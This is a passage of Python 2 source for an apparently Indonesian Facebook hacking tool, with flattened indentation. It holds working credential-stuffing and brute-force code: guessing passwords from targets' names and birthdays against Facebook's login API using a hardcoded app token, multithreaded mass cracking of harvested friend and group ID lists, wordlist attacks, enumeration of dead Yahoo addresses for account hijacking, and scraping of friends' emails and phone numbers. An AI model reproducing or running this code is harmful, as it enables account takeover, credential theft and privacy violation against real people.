pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(0.01)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name']
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
pass4 = b['last_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
pass6 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token Tidak Ada'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mSimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
